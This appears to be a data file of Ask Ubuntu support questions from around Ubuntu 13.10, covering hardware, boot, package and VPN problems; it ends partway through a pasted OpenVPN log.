363976	how to change keyboard layout to finnish , but keep language in english ?	i 'm able to set either everything finnish or everything english . i want to have finnish keyboard layout , but the os language in english . how to do this ? in the previous releases i did n't have to do anything .
363977	how to avoid chromium-browser to redirect me to ubuntu.com ?	i have a small problem , i installed ubuntu 13.10 some days ago , and i also installed chromium-browser and each time i try to run chromium-browser it redirects me to ubuntu.com . i have restored chromium-browser , changed search engines and url address . i do n't know what to do , it always redirects me . i have tried to contact google support and nothing .
363978	mac mini ubuntu 13.10 wifi not working	10 on late 2012 mac mini from usb drive ca n't get wifi card working . so many solutions on here but ca n't seem it get them working , why does it work in liveusb 'try ubuntu ' mode but not when installed ? any help appreciated am pulling my hair out here .
363983	is it possible to disable a network interface depending on some condition on boot ?	i have a ubuntu 12.04 vm ( virtualbox ) with two adapters , which are bridged to the cabled lan ( eth0 ) and wireless lan ( eth2 ) . both of them are configured as dhcp . since the host will always be connected via either the lan or the wireless adapter ( i.e . one of the two will always be disconnected ) , one of the two adapters in ubuntu will always be without ip , because it wo n't be able to query the dhcp server . in such case , i would like to trigger an ifconfig eth ( x ) down when the interface does n't have an ip address . i 've read that it 's possible to run scripts related to the network adapters , but i 'm not really sure how to do so . thanks in advance for the answers .
363986	buttons do not appear in applications like evince , etc . image viewer . in ubuntu 13.10	buttons do not appear in applications like evince , etc . image viewer . in ubuntu 13.10 i installed ubuntu 13.10 recently i found many bugs , the one that most affected me i can not print from applications such as evince , photo viewer that have to do with gnome , from firefox , thunderbird i can print perfectly
363987	how to enable paste function with ctrl-shift-v in ubuntu 13.10 ?	i have very simple question after installation/upgrade to 13.10 . seems that paste function ( or paste without formatting ) keyboard shortcut does not work in 13.10 . it was a very convenient way to paste non-formatted text in libreoffice or in the terminal . thus , my question is : how can i enable paste function with ctrl+shift+v in ubuntu 13.10 ?
363988	how to downgrade whole system	i have broken and partial upgraded system , it was attempted to upgrade from 12.04 to 12.10 some how things did not went fine , and in next consecutive months i kept using this system . later on when ever i needed to install a package like bind9 or some thing or some package i always landed in trouble , either i select one by one which package or dependency needed to be downgraded or i do some kind of circus.it wasted a lot of precious time . is it possible to bring back the system from this state to a state when 12.04 fresh installation package were present .
363991	synaptik error “no touchpad found” at startup on dell desktop	i inadvertently clicked on the `` synaptiks '' ( touchpad management ) menu in kubuntu 13.10 without owning a touchpad with my desktop . now every time i boot up i get the synaptiks error message “no touchpad found” , how do i get rid of this ? thanks in advanced !
363993	hp pavilion 15-e061so notebook pc	i have a hp pavilion 15-e061so notebook pc with win 8 and want to reinstall it with ubuntu 12.03 but it doesnt boot with the a cd or usb . any help at all will be helpfull < 3
363995	freeing space please help	my computer is running on low graphics mode because i do n't have space in /dev/sda1 when i type df -h in the terminal . how can i free up space because the sudo apt-get autoclean does n't work for me
363996	ca n't install windows 7 kvm guest on ubuntu 13.04 via command line	iâm trying to install windows 7 professional as a kvm guest using virt-install with an iso file on my ubuntu 13.04 via command line . using the following commands : root @ ziomario-macmini : / # sudo invoke-rc.d apparmor stop clearing apparmor profiles cache [ ok ] all profile caches have been cleared , but no profiles have been unloaded . unloading profiles will leave already running processes permanently unconfined , which can lead to unexpected situations . to set a process to complain mode , use the command line tool 'aa-complain ' . to really tear down all profiles , run the init script with the 'teardown ' option . '' root @ ziomario-macmini : / # sudo update-rc.d -f apparmor remove removing any system startup links for /etc/init.d/apparmor ... /etc/rcs.d/s37apparmor root @ ziomario-macmini : / # chmod go+rx /media/ziomario/09274c80-4a49-4f4f-9e2e-83c4a5578a04/os/kvm-windows/downloaded root @ ziomario-macmini : / # chmod o-rwx /media/ziomario/09274c80-4a49-4f4f-9e2e-83c4a5578a04/os/kvm-windows/downloaded/* root @ ziomario-macmini : / # sudo virt-install -- connect qemu : ///system -n win7_pro -r 800 -c /media/ziomario/09274c80-4a49-4f4f-9e2e-83c4a5578a04/os/kvm-windows/downloaded/x17-58997.iso -- vnc -- noautoconsole -- os-type windows -- os-variant win7 -- disk /dev/sdd1 , size=1000 -- accelerate starting install ... error internal error process exited while connecting to monitor : char device redirected to /dev/pts/5 ( label charserial0 ) kvm-spice : -drive file=/media/ziomario/09274c80-4a49-4f4f-9e2e-83c4a5578a04/os/kvm-windows/downloaded/x17-58997.iso , if=none , id=drive-ide0-1-0 , readonly=on , format=raw : could not open disk image /media/ziomario/09274c80-4a49-4f4f-9e2e-83c4a5578a04/os/kvm-windows/downloaded/x17-58997.iso : permission denied domain installation does not appear to have been successful . if it was , you can restart your domain by running : virsh -- connect qemu : ///system start win7_pro otherwise , please restart your installation .
363998	automatically move xubuntu panel to external monitor	i am using xubuntu 13.04 with a dualmonitor setup . ( external monitor as primary , laptop als secondary ) i am using xandr to makeup my monitorsetup . however i recognized that the xubuntu panel on the top by default will always be placed on the laptop monitor . i know that i can move the panel via the panel preferences . this works . but i want to somehow either let it move automatically to the right monitor ( the primary one ) or to move it with a terminal command ( so i can create a script which takes care of moving the panel to the primary monitor ) ... any ideas ?
364000	use apturl instead of software center for apt : links	i 've changed from friefox to chromium . everything works fine except one thing : when i hit an apt : link , it opens the ubuntu software center instead of starting the installation via apturl . ( yes , it is installed ) how can i change the default handler for apt : to apturl ? ( raring x64 )
364003	cant correctly install lazarus	i have a little problem with installing and running lazarus . i just upgrade ubuntu from 13.04 to 13.10 . when i had 13.04 , i could install lazarus without any problems , but in 13.10 lazarus magicaly dissapeared , and when i tried install it from ubuntu software center , it said something like in my software resources lazarus-ide-0.9.30.4 doesnt exist . after some research on net i tried delete all files from earlier installations , download deb packages from sourceforge and install them , but when i want to instal fpc-src , error shows up with output : ( reading database ... 100 % ( reading database ... 239063 files and directories currently installed . ) unpacking fpc-src ( from ... /stiahnut/lazarus/fpc-src.deb ) ... dpkg : error processing /home/richi/stiahnut/lazarus/fpc-src.deb ( -- install ) : trying to overwrite '/usr/share/fpcsrc/2.6.2/rtl/nativent/tthread.inc ' , which is also in package fpc-source-2.6.2 2.6.2-5 dpkg-deb ( subprocess ) : decompressing archive member : internal gzip write error : broken pipe dpkg-deb : error : subprocess < decompress > returned error exit status 2 dpkg-deb ( subprocess ) : can not copy archive member from '/home/richi/stiahnut/lazarus/fpc-src.deb ' to decompressor pipe : failed to write ( broken pipe ) when i started lazarus , it of course tell me that it cant find fpc compier and fpc sources . so , please , i really need program for school and i dont wan na reinstall os anymore or something like that : ( ( ubuntu 13.10 64bit ) p.s : im not skilled in linux so if u know some commands to fix it just write them for copy and paste : ) p.p.s : sorry for bad english , im slovak xd p.p.p.s : thank so much for any answers update : output from sudo dpkg -l | grep `` ^rc '' richi @ richi-ubuntu : ~/lazarus1.0.12 $ sudo dpkg -l | grep `` ^rc '' rc account-plugin-generic-oauth 0.10bzr13.03.26-0ubuntu1.1 amd64 gnome control center account plugin for single signon - generic oauth rc appmenu-gtk : amd64 12.10.3daily13.04.03-0ubuntu1 amd64 export gtk menus over dbus rc appmenu-gtk3 : amd64 12.10.3daily13.04.03-0ubuntu1 amd64 export gtk menus over dbus rc fp-compiler-2.6.0 2.6.0-9 amd64 free pascal - compiler rc fp-utils-2.6.0 2.6.0-9 amd64 free pascal - utilities rc lazarus-ide-0.9.30.4 0.9.30.4-4 amd64 ide for free pascal - common ide files rc lazarus-ide-1.0.10 1.0.10+dfsg-1 amd64 ide for free pascal - common ide files rc lcl-utils-0.9.30.4 0.9.30.4-4 amd64 lazarus components library - command line build tools rc lcl-utils-1.0.10 1.0.10+dfsg-1 amd64 lazarus components library - command line build tools rc libbamf3-1 : amd64 0.4.0daily13.06.19~13.04-0ubuntu1 amd64 window matching library - shared library rc libboost-filesystem1.49.0 1.49.0-4 amd64 filesystem operations ( portable paths , iteration over directories , etc ) in c++ rc libboost-signals1.49.0 1.49.0-4 amd64 managed signals and slots library for c++ rc libboost-system1.49.0 1.49.0-4 amd64 operating system ( e.g . diagnostics support ) library rc libboost-thread1.49.0 1.49.0-4 amd64 portable c++ multi-threading rc libbrlapi0.5 : amd64 4.4-8ubuntu4 amd64 braille display access via brltty - shared library rc libcamel-1.2-40 3.6.4-0ubuntu1.1 amd64 evolution mime message handling library rc libcolumbus0-0 0.4.0daily13.04.16~13.04-0ubuntu1 amd64 error tolerant matching engine - shared library rc libdns95 1:9.9.2.dfsg.p1-2ubuntu2.1 amd64 dns shared library used by bind rc libdvbpsi7 0.2.2-1 amd64 library for mpeg ts and dvb psi tables decoding and generating rc libebackend-1.2-5 3.6.4-0ubuntu1.1 amd64 utility library for evolution data servers rc libedata-book-1.2-15 3.6.4-0ubuntu1.1 amd64 backend library for evolution address books rc libedata-cal-1.2-18 3.6.4-0ubuntu1.1 amd64 backend library for evolution calendars rc libgc1c3 : amd64 1:7.2d-0ubuntu5 amd64 conservative garbage collector for c and c++ rc libgd2-xpm : amd64 2.0.36~rc1~dfsg-6.1ubuntu1 amd64 gd graphics library version 2 rc libgd2-xpm : i386 2.0.36~rc1~dfsg-6.1ubuntu1 i386 gd graphics library version 2 rc libgnome-desktop-3-4 3.6.3-0ubuntu1 amd64 utility library for loading .desktop files - runtime files rc libgphoto2-2 : amd64 2.4.14-2 amd64 gphoto2 digital camera library rc libgphoto2-2 : i386 2.4.14-2 i386 gphoto2 digital camera library rc libgphoto2-port0 : amd64 2.4.14-2 amd64 gphoto2 digital camera port library rc libgphoto2-port0 : i386 2.4.14-2 i386 gphoto2 digital camera port library rc libgtksourceview-3.0-0 : amd64 3.6.3-0ubuntu1 amd64 shared libraries for the gtk+ syntax highlighting widget rc libgweather-3-1 3.6.2-0ubuntu1 amd64 gweather shared library rc libharfbuzz0 : amd64 0.9.13-1 amd64 opentype text shaping engine rc libibus-1.0-0 : amd64 1.4.2-0ubuntu2 amd64 intelligent input bus - shared library rc libical0 0.48-2 amd64 icalendar library implementation in c ( runtime ) rc libimobiledevice3 1.1.4-1ubuntu6.2 amd64 library for communicating with the iphone and ipod touch rc libisc92 1:9.9.2.dfsg.p1-2ubuntu2.1 amd64 isc shared library used by bind rc libkms1 : amd64 2.4.46-1 amd64 userspace interface to kernel drm buffer management rc libllvm3.2 : i386 1:3.2repack-7ubuntu1 i386 low-level virtual machine ( llvm ) , runtime library rc libmikmod2 : amd64 3.1.12-5 amd64 portable sound library rc libpackagekit-glib2-14 : amd64 0.7.6-3ubuntu1 amd64 library for accessing packagekit using glib rc libpoppler28 : amd64 0.20.5-1ubuntu3 amd64 pdf rendering library rc libraw5 : amd64 0.14.7-0ubuntu1.13.04.2 amd64 raw image decoder library rc librhythmbox-core6 2.98-0ubuntu5 amd64 support library for the rhythmbox music player rc libsdl-mixer1.2 : amd64 1.2.12-7ubuntu1 amd64 mixer library for simple directmedia layer 1.2 , libraries rc libsnmp15 5.4.3~dfsg-2.7ubuntu1 amd64 snmp ( simple network management protocol ) library rc libsyncdaemon-1.0-1 4.2.0-0ubuntu1 amd64 ubuntu one synchronization daemon library rc libunity-core-6.0-5 7.0.0daily13.06.19~13.04-0ubuntu1 amd64 core library for the unity interface . rc libusb-0.1-4 : i386 2:0.1.12-23.2ubuntu1 i386 userspace usb programming library rc libwayland0 : amd64 1.0.5-0ubuntu1 amd64 wayland compositor infrastructure - shared libraries rc linux-image-3.8.0-19-generic 3.8.0-19.30 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp rc linux-image-3.8.0-31-generic 3.8.0-31.46 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp rc linux-image-extra-3.8.0-19-generic 3.8.0-19.30 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp rc linux-image-extra-3.8.0-31-generic 3.8.0-31.46 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp rc screen-resolution-extra 0.15ubuntu1 all extension for the gnome screen resolution applet rc unity-common 7.0.0daily13.06.19~13.04-0ubuntu1 all common files for the unity interface .
364005	there was an error getting information about `` / '' while copying to desktop	currently running ubuntu 13.10 after a fresh install/re install due to this problem . the error occurs whenever i try to drag a file from the ubuntu search ( in the launcher ) , to the desktop . the whole error message is as follows ... '' error while copying . there was an error getting information about â/â . '' show more details reveals the following ... '' the specified location is not supported '' i do n't understand the problem and ca n't see any clear way of fixing it . any and all advice would be appreciated . : )
364008	when i try to save any file , it gives me `` permission denied ''	it does n't matter where , it just wo n't save any files . i have tried running gksudo gedit /etc/default/grub , because i am trying to change the quiet splash to elevator=deadline but when i try to save it , `` permission denied '' when i type gksudo gedit /etc/default/grub , it prompts me for a password , then nothing opens . what should i do ?
364012	dell xps 12 and ubuntu 13.10 touchpad/screen woes	i have read all the links and posts . slapping 13.10 onto this xps 12 convertible runs everything fine out of the box , bar some things . touchpad ( no multitouch/scrolling ) - sputnik only supports up to 12.10 and all changes are supposed to have been integrated . no touchpad option shows up in settings touchscreen is supported but only as a pointer , i.e . not able to scroll in chrome etc screen rotation ( least important , but no switching when the button is pressed ) . i am not looking for handouts , or step by steps , but i was wondering if someone has had any experience with these issues ? thanks !
364013	grub menu problem in windows 8 dual boot	after install ubuntu 13.04 in pre installed windows 8 , ubuntu is successfully installed but every time i start the system windows boot loader show both the os , in that windows 8 works perfectly but when i select ubuntu it will ask for windows 8 dvd saying that this is because of the other os installed in it giving 2 options at the bottom ends saying esc to select os and enter to uefi boot and to select ubuntu i need to change my boot options to legacy suppot and legacy fisrt so that ill get grub menu of ubuntu but in that windows 8 loader doesnt work again saying that plz install dvd of windows 8 plz provide me a solution so that i could select both the os from any of the boot loaders .
364015	where are tutorials and is it qml or qt	hi there my question is that where can i find any good qml tutorials for ubuntu phone app developing ( i 've seen the developer.ubuntu.com site but still thats not enough ) and witch of the 2 languages is it to develp ubuntu phone apps qt or qml ? ? .
364018	ubuntu 13.10 alongside windows 7 - mission impossible ?	i just want to install ubuntu 13.10 alongside windows 7 hp on my eeepc 1215n . i ca n't do it when windows 7 is booted up ( wubi.exe has n't got that option ) , so i booted it from usb key . everything 's loaded , i double-click install ubuntu . i click 'next > ' , then i choose that i want to install ubuntu alongside windows 7 . and the machine restarts . not resets . restarts . x server 's killed immediately , i can see the console only . what do i have to do now ?
364025	openvpn issue , sigterm [ soft , init_instance ] received , process exiting	after upgrading from 13.04 to 13.10 , the existed openvpn is longer working . i run sudo openvpn xxx.ovpn and it returns sigterm [ soft , init_instance ] received , process exiting if i try to connect it via network-manager by clicking the on button , it becomes off immediately . any idea that how to get it back to work ? ? ? thanks . edited : here 's the result with verb 7 thu oct 24 10:44:22 2013 us=980057 current parameter settings : thu oct 24 10:44:22 2013 us=980532 config = 'hk.ovpn' thu oct 24 10:44:22 2013 us=980569 mode = 0 thu oct 24 10:44:22 2013 us=980598 persist_config = disabled thu oct 24 10:44:22 2013 us=980628 persist_mode = 1 thu oct 24 10:44:22 2013 us=980655 show_ciphers = disabled thu oct 24 10:44:22 2013 us=980683 show_digests = disabled thu oct 24 10:44:22 2013 us=980709 show_engines = disabled thu oct 24 10:44:22 2013 us=980736 genkey = disabled thu oct 24 10:44:22 2013 us=980762 key_pass_file = ' [ undef ] ' thu oct 24 10:44:22 2013 us=980789 show_tls_ciphers = disabled thu oct 24 10:44:22 2013 us=980815 connection profiles [ default ] : thu oct 24 10:44:22 2013 us=980842 proto = tcp-client thu oct 24 10:44:22 2013 us=980868 local = ' [ undef ] ' thu oct 24 10:44:22 2013 us=980895 local_port = 0 thu oct 24 10:44:22 2013 us=980922 remote = 'localhost' thu oct 24 10:44:22 2013 us=980949 remote_port = 1194 thu oct 24 10:44:22 2013 us=980974 remote_float = disabled thu oct 24 10:44:22 2013 us=980996 bind_defined = disabled thu oct 24 10:44:22 2013 us=981018 bind_local = disabled thu oct 24 10:44:22 2013 us=981040 connect_retry_seconds = 1 thu oct 24 10:44:22 2013 us=981063 connect_timeout = 10 thu oct 24 10:44:22 2013 us=981085 connect_retry_max = 2 thu oct 24 10:44:22 2013 us=981106 begin http_proxy thu oct 24 10:44:22 2013 us=981128 server = 'xxx.xxx.net' thu oct 24 10:44:22 2013 us=981149 port = 443 thu oct 24 10:44:22 2013 us=981171 auth_method_string = 'basic' thu oct 24 10:44:22 2013 us=981192 auth_file = 'access' thu oct 24 10:44:22 2013 us=981213 retry = disabled thu oct 24 10:44:22 2013 us=981235 timeout = 5 thu oct 24 10:44:22 2013 us=981256 http_version = '1.0' thu oct 24 10:44:22 2013 us=981277 user_agent = ' [ undef ] ' thu oct 24 10:44:22 2013 us=981299 end http_proxy thu oct 24 10:44:22 2013 us=981320 socks_proxy_server = ' [ undef ] ' thu oct 24 10:44:22 2013 us=981342 socks_proxy_port = 0 thu oct 24 10:44:22 2013 us=981363 socks_proxy_retry = disabled thu oct 24 10:44:22 2013 us=981385 tun_mtu = 1500 thu oct 24 10:44:22 2013 us=981406 tun_mtu_defined = enabled thu oct 24 10:44:22 2013 us=981428 link_mtu = 1500 thu oct 24 10:44:22 2013 us=981449 link_mtu_defined = disabled thu oct 24 10:44:22 2013 us=981471 tun_mtu_extra = 0 thu oct 24 10:44:22 2013 us=981493 tun_mtu_extra_defined = disabled thu oct 24 10:44:22 2013 us=981526 mtu_discover_type = -1 thu oct 24 10:44:22 2013 us=981548 fragment = 0 thu oct 24 10:44:22 2013 us=981570 mssfix = 1450 thu oct 24 10:44:22 2013 us=981592 explicit_exit_notification = 0 thu oct 24 10:44:22 2013 us=981617 connection profiles end thu oct 24 10:44:22 2013 us=981639 remote_random = disabled thu oct 24 10:44:22 2013 us=981661 ipchange = ' [ undef ] ' thu oct 24 10:44:22 2013 us=981690 dev = 'tun' thu oct 24 10:44:22 2013 us=981716 dev_type = ' [ undef ] ' thu oct 24 10:44:22 2013 us=981745 dev_node = ' [ undef ] ' thu oct 24 10:44:22 2013 us=981774 lladdr = ' [ undef ] ' thu oct 24 10:44:22 2013 us=981801 topology = 1 thu oct 24 10:44:22 2013 us=981830 tun_ipv6 = disabled thu oct 24 10:44:22 2013 us=981857 ifconfig_local = ' [ undef ] ' thu oct 24 10:44:22 2013 us=981883 ifconfig_remote_netmask = ' [ undef ] ' thu oct 24 10:44:22 2013 us=981905 ifconfig_noexec = disabled thu oct 24 10:44:22 2013 us=981926 ifconfig_nowarn = disabled thu oct 24 10:44:22 2013 us=981949 ifconfig_ipv6_local = ' [ undef ] ' thu oct 24 10:44:22 2013 us=981970 ifconfig_ipv6_netbits = 0 thu oct 24 10:44:22 2013 us=981992 ifconfig_ipv6_remote = ' [ undef ] ' thu oct 24 10:44:22 2013 us=982014 shaper = 0 thu oct 24 10:44:22 2013 us=982035 mtu_test = 0 thu oct 24 10:44:22 2013 us=982056 mlock = disabled thu oct 24 10:44:22 2013 us=982078 keepalive_ping = 0 thu oct 24 10:44:22 2013 us=982099 keepalive_timeout = 0 thu oct 24 10:44:22 2013 us=982120 inactivity_timeout = 0 thu oct 24 10:44:22 2013 us=982142 ping_send_timeout = 0 thu oct 24 10:44:22 2013 us=982163 ping_rec_timeout = 0 thu oct 24 10:44:22 2013 us=982185 ping_rec_timeout_action = 0 thu oct 24 10:44:22 2013 us=982206 ping_timer_remote = disabled thu oct 24 10:44:22 2013 us=982236 remap_sigusr1 = 0 thu oct 24 10:44:22 2013 us=982258 persist_tun = disabled thu oct 24 10:44:22 2013 us=982279 persist_local_ip = disabled thu oct 24 10:44:22 2013 us=982300 persist_remote_ip = disabled thu oct 24 10:44:22 2013 us=982321 persist_key = enabled thu oct 24 10:44:22 2013 us=982342 passtos = disabled thu oct 24 10:44:22 2013 us=982364 resolve_retry_seconds = 0 thu oct 24 10:44:22 2013 us=982385 username = ' [ undef ] ' thu oct 24 10:44:22 2013 us=982406 groupname = ' [ undef ] ' thu oct 24 10:44:22 2013 us=982427 chroot_dir = ' [ undef ] ' thu oct 24 10:44:22 2013 us=982449 cd_dir = ' [ undef ] ' thu oct 24 10:44:22 2013 us=982470 writepid = ' [ undef ] ' thu oct 24 10:44:22 2013 us=982491 up_script = ' [ undef ] ' thu oct 24 10:44:22 2013 us=982534 down_script = ' [ undef ] ' thu oct 24 10:44:22 2013 us=982557 down_pre = disabled thu oct 24 10:44:22 2013 us=982578 up_restart = disabled thu oct 24 10:44:22 2013 us=982599 up_delay = disabled thu oct 24 10:44:22 2013 us=982621 daemon = disabled thu oct 24 10:44:22 2013 us=982642 inetd = 0 thu oct 24 10:44:22 2013 us=982663 log = disabled thu oct 24 10:44:22 2013 us=982684 suppress_timestamps = disabled thu oct 24 10:44:22 2013 us=982706 nice = 0 thu oct 24 10:44:22 2013 us=982727 verbosity = 7 thu oct 24 10:44:22 2013 us=982748 mute = 0 thu oct 24 10:44:22 2013 us=982769 gremlin = 0 thu oct 24 10:44:22 2013 us=982790 status_file = ' [ undef ] ' thu oct 24 10:44:22 2013 us=982812 status_file_version = 1 thu oct 24 10:44:22 2013 us=982833 status_file_update_freq = 60 thu oct 24 10:44:22 2013 us=982855 occ = enabled thu oct 24 10:44:22 2013 us=982876 rcvbuf = 65536 thu oct 24 10:44:22 2013 us=982897 sndbuf = 65536 thu oct 24 10:44:22 2013 us=982919 mark = 0 thu oct 24 10:44:22 2013 us=982940 sockflags = 0 thu oct 24 10:44:22 2013 us=982961 fast_io = disabled thu oct 24 10:44:22 2013 us=982982 lzo = 7 thu oct 24 10:44:22 2013 us=983003 route_script = ' [ undef ] ' thu oct 24 10:44:22 2013 us=983026 route_default_gateway = ' [ undef ] ' thu oct 24 10:44:22 2013 us=983048 route_default_metric = 0 thu oct 24 10:44:22 2013 us=983069 route_noexec = disabled thu oct 24 10:44:22 2013 us=983091 route_delay = 0 thu oct 24 10:44:22 2013 us=983112 route_delay_window = 30 thu oct 24 10:44:22 2013 us=983133 route_delay_defined = disabled thu oct 24 10:44:22 2013 us=983154 route_nopull = disabled thu oct 24 10:44:22 2013 us=983176 route_gateway_via_dhcp = disabled thu oct 24 10:44:22 2013 us=983198 max_routes = 2500 thu oct 24 10:44:22 2013 us=983219 allow_pull_fqdn = disabled thu oct 24 10:44:22 2013 us=983241 management_addr = ' [ undef ] ' thu oct 24 10:44:22 2013 us=983262 management_port = 0 thu oct 24 10:44:22 2013 us=983283 management_user_pass = ' [ undef ] ' thu oct 24 10:44:22 2013 us=983304 management_log_history_cache = 250 thu oct 24 10:44:22 2013 us=983376 management_echo_buffer_size = 100 thu oct 24 10:44:22 2013 us=983413 management_write_peer_info_file = ' [ undef ] ' thu oct 24 10:44:22 2013 us=983448 management_client_user = ' [ undef ] ' thu oct 24 10:44:22 2013 us=983472 management_client_group = ' [ undef ] ' thu oct 24 10:44:22 2013 us=983497 management_flags = 0 thu oct 24 10:44:22 2013 us=983533 shared_secret_file = ' [ undef ] ' thu oct 24 10:44:22 2013 us=983580 key_direction = 2 thu oct 24 10:44:22 2013 us=983618 ciphername_defined = enabled thu oct 24 10:44:22 2013 us=983654 ciphername = 'bf-cbc' thu oct 24 10:44:22 2013 us=983689 authname_defined = enabled thu oct 24 10:44:22 2013 us=983724 authname = 'sha1' thu oct 24 10:44:22 2013 us=983759 prng_hash = 'sha1' thu oct 24 10:44:22 2013 us=983801 prng_nonce_secret_len = 16 thu oct 24 10:44:22 2013 us=983836 keysize = 0 thu oct 24 10:44:22 2013 us=983870 engine = disabled thu oct 24 10:44:22 2013 us=983904 replay = enabled thu oct 24 10:44:22 2013 us=983939 mute_replay_warnings = disabled thu oct 24 10:44:22 2013 us=983973 replay_window = 64 thu oct 24 10:44:22 2013 us=984007 replay_time = 15 thu oct 24 10:44:22 2013 us=984042 packet_id_file = ' [ undef ] ' thu oct 24 10:44:22 2013 us=984077 use_iv = enabled thu oct 24 10:44:22 2013 us=984111 test_crypto = disabled thu oct 24 10:44:22 2013 us=984147 tls_server = disabled thu oct 24 10:44:22 2013 us=984181 tls_client = enabled thu oct 24 10:44:22 2013 us=984215 key_method = 2 thu oct 24 10:44:22 2013 us=984249 ca_file = 'ca.cer' thu oct 24 10:44:22 2013 us=984283 ca_path = ' [ undef ] ' thu oct 24 10:44:22 2013 us=984316 dh_file = ' [ undef ] ' thu oct 24 10:44:22 2013 us=984350 cert_file = ' [ undef ] ' thu oct 24 10:44:22 2013 us=984383 priv_key_file = ' [ undef ] ' thu oct 24 10:44:22 2013 us=984417 pkcs12_file = ' [ undef ] ' thu oct 24 10:44:22 2013 us=984451 cipher_list = 'rc4-md5' thu oct 24 10:44:22 2013 us=984485 tls_verify = ' [ undef ] ' thu oct 24 10:44:22 2013 us=984550 tls_export_cert = ' [ undef ] ' thu oct 24 10:44:22 2013 us=984589 verify_x509_type = 0 thu oct 24 10:44:22 2013 us=984630 verify_x509_name = ' [ undef ] ' thu oct 24 10:44:22 2013 us=984643 crl_file = ' [ undef ] ' thu oct 24 10:44:22 2013 us=984655 ns_cert_type = 1 thu oct 24 10:44:22 2013 us=984668 remote_cert_ku [ i ] = 0 thu oct 24 10:44:22 2013 us=984681 remote_cert_ku [ i ] = 0 thu oct 24 10:44:22 2013 us=984693 remote_cert_ku [ i ] = 0 thu oct 24 10:44:22 2013 us=984706 remote_cert_ku [ i ] = 0 thu oct 24 10:44:22 2013 us=984718 remote_cert_ku [ i ] = 0 thu oct 24 10:44:22 2013 us=984731 remote_cert_ku [ i ] = 0 thu oct 24 10:44:22 2013 us=984743 remote_cert_ku [ i ] = 0 thu oct 24 10:44:22 2013 us=984756 remote_cert_ku [ i ] = 0 thu oct 24 10:44:22 2013 us=984768 remote_cert_ku [ i ] = 0 thu oct 24 10:44:22 2013 us=984780 remote_cert_ku [ i ] = 0 thu oct 24 10:44:22 2013 us=984793 remote_cert_ku [ i ] = 0 thu oct 24 10:44:22 2013 us=984805 remote_cert_ku [ i ] = 0 thu oct 24 10:44:22 2013 us=984818 remote_cert_ku [ i ] = 0 thu oct 24 10:44:22 2013 us=984830 remote_cert_ku [ i ] = 0 thu oct 24 10:44:22 2013 us=984843 remote_cert_ku [ i ] = 0 thu oct 24 10:44:22 2013 us=984855 remote_cert_ku [ i ] = 0 thu oct 24 10:44:22 2013 us=984867 remote_cert_eku = ' [ undef ] ' thu oct 24 10:44:22 2013 us=984880 ssl_flags = 0 thu oct 24 10:44:22 2013 us=984893 tls_timeout = 2 thu oct 24 10:44:22 2013 us=984905 renegotiate_bytes = 0 thu oct 24 10:44:22 2013 us=984918 renegotiate_packets = 0 thu oct 24 10:44:22 2013 us=984930 renegotiate_seconds = 3600 thu oct 24 10:44:22 2013 us=984943 handshake_window = 60 thu oct 24 10:44:22 2013 us=984955 transition_window = 3600 thu oct 24 10:44:22 2013 us=984968 single_session = disabled thu oct 24 10:44:22 2013 us=984980 push_peer_info = disabled thu oct 24 10:44:22 2013 us=984993 tls_exit = disabled thu oct 24 10:44:22 2013 us=985006 tls_auth_file = 'ta' thu oct 24 10:44:22 2013 us=985019 pkcs11_protected_authentication = disabled thu oct 24 10:44:22 2013 us=985031 pkcs11_protected_authentication = disabled thu oct 24 10:44:22 2013 us=985044 pkcs11_protected_authentication = disabled thu oct 24 10:44:22 2013 us=985057 pkcs11_protected_authentication = disabled thu oct 24 10:44:22 2013 us=985069 pkcs11_protected_authentication = disabled thu oct 24 10:44:22 2013 us=985082 pkcs11_protected_authentication = disabled thu oct 24 10:44:22 2013 us=985095 pkcs11_protected_authentication = disabled thu oct 24 10:44:22 2013 us=985108 pkcs11_protected_authentication = disabled thu oct 24 10:44:22 2013 us=985120 pkcs11_protected_authentication = disabled thu oct 24 10:44:22 2013 us=985133 pkcs11_protected_authentication = disabled thu oct 24 10:44:22 2013 us=985145 pkcs11_protected_authentication = disabled thu oct 24 10:44:22 2013 us=985157 pkcs11_protected_authentication = disabled thu oct 24 10:44:22 2013 us=985169 pkcs11_protected_authentication = disabled thu oct 24 10:44:22 2013 us=985181 pkcs11_protected_authentication = disabled thu oct 24 10:44:22 2013 us=985194 pkcs11_protected_authentication = disabled thu oct 24 10:44:22 2013 us=985206 pkcs11_protected_authentication = disabled thu oct 24 10:44:22 2013 us=985220 pkcs11_private_mode = 00000000 thu oct 24 10:44:22 2013 us=985232 pkcs11_private_mode = 00000000 thu oct 24 10:44:22 2013 us=985245 pkcs11_private_mode = 00000000 thu oct 24 10:44:22 2013 us=985258 pkcs11_private_mode = 00000000 thu oct 24 10:44:22 2013 us=985270 pkcs11_private_mode = 00000000 thu oct 24 10:44:22 2013 us=985282 pkcs11_private_mode = 00000000 thu oct 24 10:44:22 2013 us=985295 pkcs11_private_mode = 00000000 thu oct 24 10:44:22 2013 us=985307 pkcs11_private_mode = 00000000 thu oct 24 10:44:22 2013 us=985319 pkcs11_private_mode = 00000000 thu oct 24 10:44:22 2013 us=985332 pkcs11_private_mode = 00000000 thu oct 24 10:44:22 2013 us=985344 pkcs11_private_mode = 00000000 thu oct 24 10:44:22 2013 us=985356 pkcs11_private_mode = 00000000 thu oct 24 10:44:22 2013 us=985368 pkcs11_private_mode = 00000000 thu oct 24 10:44:22 2013 us=985380 pkcs11_private_mode = 00000000 thu oct 24 10:44:22 2013 us=985393 pkcs11_private_mode = 00000000 thu oct 24 10:44:22 2013 us=985405 pkcs11_private_mode = 00000000 thu oct 24 10:44:22 2013 us=985417 pkcs11_cert_private = disabled thu oct 24 10:44:22 2013 us=985429 pkcs11_cert_private = disabled thu oct 24 10:44:22 2013 us=985441 pkcs11_cert_private = disabled thu oct 24 10:44:22 2013 us=985453 pkcs11_cert_private = disabled thu oct 24 10:44:22 2013 us=985465 pkcs11_cert_private = disabled thu oct 24 10:44:22 2013 us=985478 pkcs11_cert_private = disabled thu oct 24 10:44:22 2013 us=985490 pkcs11_cert_private = disabled thu oct 24 10:44:22 2013 us=985504 pkcs11_cert_private = disabled thu oct 24 10:44:22 2013 us=985526 pkcs11_cert_private = disabled thu oct 24 10:44:22 2013 us=985538 pkcs11_cert_private = disabled thu oct 24 10:44:22 2013 us=985550 pkcs11_cert_private = disabled thu oct 24 10:44:22 2013 us=985563 pkcs11_cert_private = disabled thu oct 24 